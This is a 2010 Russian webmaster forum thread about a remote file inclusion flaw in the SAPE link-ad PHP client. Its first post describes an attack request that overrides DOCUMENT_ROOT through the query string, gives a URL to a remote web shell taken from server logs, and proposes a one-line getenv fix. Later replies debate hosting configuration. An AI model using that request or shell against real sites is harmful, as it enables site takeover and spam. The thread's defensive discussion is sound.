17.04.2010, 18:24 | #1 |
Новичок
|
Уязвимость сайта после вставки кода sape
Практика показала, что на некоторых хостингах и для некоторых движков код
Код:
<?php if (!defined('_SAPE_USER')){ define('_SAPE_USER', 'd56b17c1d94442b8874c6ad44aae3202'); } require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); $sape = new SAPE_client(); ?> require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); Злоумышненники, используя запрос вида http://www.ваш-сайт.ru////?_SERVER[D...afterlife.txt? могут нарушить работу вашего сайта, в том числе рассылать спам от имени вашего сайта. В качестве строчки после _SERVER[DOCUMENT_ROOT] используется ссылка на код эксплоита (ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно), а заодно проверить, не случится ли чего с вашим сайтом, если его подставить на место www.ваш-сайт.ru). Решение проблемы на стороне сайта: заменить Код:
require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); Код:
require_once(getenv('DOCUMENT_ROOT').'/'._SAPE_USER.'/sape.php'); |
17.04.2010, 20:13 | #3 | ||
Эксперт
Регистрация: 03.07.2007
Адрес: Chinatown
Сообщений: 7,265
Вес репутации: 609
|
Цитата:
Цитата:
__________________
тексты по 10 руб/кзнак автоматизируй все, не мучайся! |
||
17.04.2010, 20:16 | #4 |
Пожиратель черепашкоВ
Регистрация: 24.12.2008
Адрес: Телемелетрямдия
Сообщений: 4,739
Вес репутации: 395
|
__________________
|
17.04.2010, 20:25 | #5 |
Специалист
Регистрация: 06.11.2009
Сообщений: 428
Вес репутации: 185
|
Это что, такой оригинальный способ распространят вирусы ТС придумал? -)))
|
18.04.2010, 05:01 | #6 |
Новичок
|
dark, уходить с хостинга - вариант, переписать движок - тоже вариант (нормально написанный движок и нормально настроенный хостинг такой уязвимости не должны допустить), но если изменить в коде сапы одну строчку, то без потери функциональности проблемы можно избежать (кмк) на любом движке и на любом хостинге.
|
18.04.2010, 12:19 | #8 |
Новичок
|
sylex, конечно, неизвестно.
И кстати проверил все свои сайты - сапа не добавила уязвимостей нормально написанному сайту. А вот затрояненный клиент на поддержку достался - куча сайтов с этой проблемой. А учитывая, что у сапы десятки тысяч сайтов, то даже пара процентов проблемных - это много. Поэтому, считаю, что если можно повысить безопасность кода, это надо сделать. |
18.04.2010, 19:33 | #9 |
Администратор
Регистрация: 05.02.2007
Сообщений: 18,405
Вес репутации: 715
|
Shema, абсолютно все могут НЕ пользоваться строчкой $_SERVER['DOCUMENT_ROOT'].
Что во первых - не уберет уязвимость, если она есть на этом хостинге. 2 - в приведенном примере что то сапы? Ну а объяснить как ставить по другому чтобы было понятно ВСЕМ и работало ...
__________________
Читаем ФАК |
18.04.2010, 19:49 | #10 | |
Починяю примуса
Регистрация: 26.09.2008
Сообщений: 1,505
Вес репутации: 285
|
ТС, мои соболезнования, если ваш хост и сайт позволяют подставлять в ГЕт суперглобальные переменные, то...
Цитата:
__________________
|
|
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Нужен php-скрипт для вставки текста | SergejF | Разработка и сопровождение сайтов | 8 | 15.04.2010 23:09 |
Взлом сайта с установкой кода sape | Paffy | Вопросы по работе системы | 4 | 31.01.2009 17:12 |
Проблема с индексацией страниц после обновления кода sape для контекстных ссылок | serp | Ошибки при работе с системой | 0 | 06.03.2008 14:29 |
После установки кода sape сайты выпали из yandexa | mgpetrov | Яндекс | 9 | 27.06.2007 16:44 |
полная замена движка сайта: порядок переноса кода SAPE? | saddat | Вопросы по работе системы | 23 | 30.04.2007 10:23 |
Часовой пояс GMT +3, время: 01:37.